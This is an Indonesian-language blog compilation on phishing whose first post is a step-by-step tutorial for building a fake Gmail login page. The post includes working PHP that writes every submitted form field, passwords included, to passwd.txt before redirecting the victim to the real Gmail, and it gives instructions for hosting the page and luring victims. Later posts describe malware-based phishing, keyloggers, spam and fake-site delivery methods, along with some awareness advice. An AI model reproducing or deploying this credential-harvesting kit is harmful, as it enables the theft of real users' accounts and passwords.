Cara membuat situs phising gmail

Membuat situs phising sebenarnya mudah untuk membuatnya, sama dengan membuat situs phising dengan facebook. Namun di Gmail ini agak berbeda sedikit dengan situs palsu Facebook. Saya dulu sudah pernah posting tentang bagaimana caranya Hack Gmail Account. Dan kali ini saya akan posting bagaimana caranya membuat situs palsu Gmail atau yang lebih dikenal dengan Phising Fake Gmail. 

Cara untuk mendapatkan username dan password cara yang paling ampuh adalah dengan membuat situs palsu, atau anda ingin mendapatkan username dan password facebook anda juga bisa membuat situs palsu seperti Gmail. Dan bagaimana caranya agar anda bisa mengajak korban untuk login ke situs palsu yang anda buat tadi. Dan otomatis anda akan mendapatkan huruf asterix tersebut.

Langkah-langkah Fake Gmail :

Step 1 :  Pergi ke situs www. Gmail.com dan klik kanan pilih "View Page Source" atau cara cepatnya Ctrl+U.

Step 2:  Tekan keyboard Ctrl+A, dan copy dan paste di Notepad.

Step 3 : Cari kode <form, anda bisa melihat kode "<form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post">".

Step 4 :  Sekarang ganti kode tersebut dengan kode :  <form id="gaia_loginform" action="write.php" method="post">,  jangan lupa untuk di save dengan extensi .html bukan lagi .txt .

Step 5 :  Sekarang buat file write.php, buka Program Notepad  anda bisa copykan script php di bawah ini :

<?php
header("Location: http://www.gmail.com/");
$handle = fopen("passwd.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Step 6 :  Dan save script php tersebut dengan extensi .php bukan lagi .txt .

Step 7 :  Buka Notepad dan save dengan nama file passwd.txt .

Step 8 :  Upload tiga buah file tadi { index.html, write.php, passwd.tx } ke free hosting .

Atau :
Anda juga bisa download file Gmail fake disini.

untuk melihat hasilnya klik disini

 Jangan lupa sob berikan tanggapan tentang postingan ini.

Malware-Based Phising

Masih di bab yang mempelajari tentang phising kemaren saya sudah jelaskan apa keuntungan menggunakan teknik phising termasuk phising site, email spam dan lain sebagianya pada metode ini pelaku phising memanfaatkan malware untuk menyerang komputer pengguna atau korbanya. Kebanyakan malware menyebarkan dirinya dengan memanfaatkan situs-situs yang memberikan software yang diklaim akan menghilangkan registrasi atau menjalankan aktivasi program populer seperti adobe photoshop atau software daari microsoft namun kebanyakan adalah installasi program malware kedalam komputer korbanya.

Malware yang terinstall kedalam komputer korban, bisa melakukan banyak hal sesuai dengan keinginan pelaku phising. Beberapa fungsi yang sering dijalankan adalah :

Keylogger, program yang satu ini memang idak lepas dari kategori software hacking, keyloger adalah ketikan keyboard komputer untuk mendapatakn password atau informasi berharga lainya.

Screen Logger, pasti anda semua sudah tahu fungsi dari screen Logger atau nama lain yaitu screen shot yang berfungsi mencuri tampilan layar yang bisa digunakan  untuk melihat apa yang sedang ditampilkan didepan monitor komputer korban.

Web Trojan, disini malware yang telah terinstall didalam komputer korban akan memunculkan pop-up window seakan-akan berasal dari website yang sedang dikunungi.

Sebagai contoh, anda mengunjungi website internet banking dan tiba-tiba muncul pop-up yan meminta anda memasukkan kembali username dan password. Beberapa malware suka menggunakan cara ini karena membuat pengguna menyalahkan website yang mereka gunakan, padahal, pop-up tersebut berasal dari malware yang ada didalam komputer korban.

Mungkin itu saja yang saya terangkan tentang materi Malware-Based Phising.

Semoga Bermanfaat......!!!!

jangan lupa kasih comment yaw.....:D

Yang Menjadi Korban Phising

Ketika anda mendapatkan sebuah link yang anda dapatkan melalui email,dan anda mengklik link tersebut dan anda akan dibawah ke situs jebakan phising site,  ketika anda memasukan username dan password anda di halaman facebook login yang palsu maka dengan begitu orang yang memasang jebakan tersebut pun bisa masuk akun facebook anda dengan mudah, loh kog bisa ?. Karena anda kurang begitu jeli dalam melihat isi content email tersebut dan kurang pengetahuan tentang phising. Untuk itu kali ini saya akan berbagi ilmu tentang bagaimana terjadinya phising. Phising biasanya memanfaatkan email, website palsu, spyware dan berbagai media lainya untuk melakukan aksinya. Beberapa hal yang menyebabkan aksi phising ini terus tejadi dan memakan banyak korban  adalah :

1. Ketidaktahuan atau kurangya pengetahuan.

 

kurangnya pengetahuan akan teknologi komputer membuat pelaku phising mudah mendapatkan mangsanya. Dengan memberikan email yang menakutkan, seperti ancaman hilangnya akun facebook akan membuat segera melakukan apa yang diminta.

2. Tampilan palsu yang menyesatkan.

 

 Pemalsuan website dan gambar-gambar sangat mudah dilakukan melalui internet dan pengguna awam biasanya tidak menyadari hal tersebut. Hanya dengan melakukan copy dan paste, sebuah website yang mirip dengan asli akan langsung tercipta. Pelaku Phising juga bisa membuat yang tampak sangat bagus dengan berbagai komentar penggunanya yang semuanya fiktif untuk menyakinkan calon korbanya.

3. Kurangnya perhatian pada indikator keamanan.

 

Sangat sering, pesan-pesan yang muncul tidak dibaca oleh penggunanya. Biasanya , pesan-pesan ini terlalu teknis untuk pengguna awam sehingga mereka selalu menklik tombol "OK" untuk melanjutkan. Kebiasaan semacam ini membawa keuntungan tersendiri untuk pelaku phising sehingga mereka bisa memalsukan website dan mendapatkan informasi yang berharga yang dimasukan oleh korbanya.


Semoga Bermanfaat....!!!
Jangan lupa comment yaw.....:D

Cara Metode Phising

Masih dalam dunia Phising, dulu saya sudah jelaskan bagiamana terjadinya phising yang dulu saya sudah posting di blog ini. Untuk medapatkan password banyak sekali cara yang digunakan untuk mendapatkanya, dan termasuk phising. Untuk mendapatkan korbanya, banyak cara yang digunakan dan hal ini biasanya terus berkembang sesuai dengan perkembangan yang ada didalam dunia internet. Beberapa metode yang populer di gunakan adalah :

1. Email / SPAM

 

Media yang paling favorit digunakan untuk mencari korban adalah email. Email dipilih karena murah dan mudah untuk digunakan.Pelaku bisa mengirim jutaan email setiap harinya tanpa perlu mengeluarkan biaya besar. Bahkan pelaku phising juga suka menggunakan server-server bajakan untuk melakukan aksinya. Penggunaan email dilakukan karena sangat mudah memalsukan email. Pelaku bisa meruah FROM menjadi apa saja karena memang tidak ada Verifikasi didalam email.Pelaku bisa membuat email dengan mengambil format dari email resmi agar lebih meyakinkan dan merubah bagian-bagian yang dipelukan saja.

2. Web-based Delivery

 

Pelaku phising juga memanfaatkan website dalam melakukan aksinya. Pelaku biasanya membuat website yang mirip dengan website-website terkenal untuk mengelaabuhi korbanya, dan tidak asing lagi bagi kita yaitu phising Facebook, cara ini juga bisa hack password dan username facebook. Website perusahaan beasr sangatlah mudah untuk dilakukan karena pelaku hanya perlu membuat tampilan yang mirip dengan website, tanpa perlu membuat fungsi atau faslilitas yang sama karena tujuanya hanya adalah agar korban memasukan username dan password didalamnya kemudian korban akan dibawa ke situs asli agar tidak curiga.

Pelaku phising yang kreatif bahkan memanfaatkan banner dan media iklan resmi untuk mengelabuhi korbanya. Karena merasa mengklik iklan dari website resmi, mereka mengira website yang dikunjungi pantas untuk dipercaya juga padaha, hal ini tidak berhubungan sama sekali.
Misalnya : Anda melihat sebuah iklan di  situs detik.com yang terpercaya, tentunya anda tidak akan mengira website yang anda kunjungi mempunyai maksud buruk. Atas dasar kepercayaan semacam ini, pelaku phising tidak akan ragu-ragu memanfaatkan website-website ternama untuk melakukan aksinya.

3. IRC/Instant Messaging

 

Media chatting yang banyak digunakan juga menjadi sebagai pelaku phising untuk mengirimkan alamat-alamat yang menjebak kepada korbanya. Biasanya pelaku mengirimkan link ini secara acak namun ada juga yang melakukan pendekatan terlebih dahulu sebelum mengirimkan informasi situs palsu ini. Atau juga bisa dengan menggunakan teknik chat online yang menipu korbanya.

Misalnya : Anda sedang online di facebook dan teman anda juga sedang online tetapi anda tidak tahu kalau yang chatting dengan anda adalah bukan teman anda, dan suatu ketika orang yang anda mau pinjam uang kepada anda, dengan alasan yang begitu meyakinkan, dan meminta uangnya di transfer, tetapi sebelum anda mempercayainya cobalah hubungi teman anda terlebih dahulu yang punya facebook lewat handpone, dengan begitu anda akan bisa mengindari IRC/Instant Messaging.

4. Trojan

 

Pelaku phising, terkadang juga menipu korbanya agar menginstall trojan dan memanfaatkan trojan tersebut untuk mengelabuhi korbanya. Trojan memungkinkan pengontrolan secara penuh komputer korban sehingga korban bisa dialihkan ke tempat-tempat yang telah di sediakan jebakan.


Itulah cara-cara yang sering digunakan oleh hacker dalam melakukan aksinya... 

Semoga Bermanfaat.....!!!
Jangan Lupa comment yaw....:D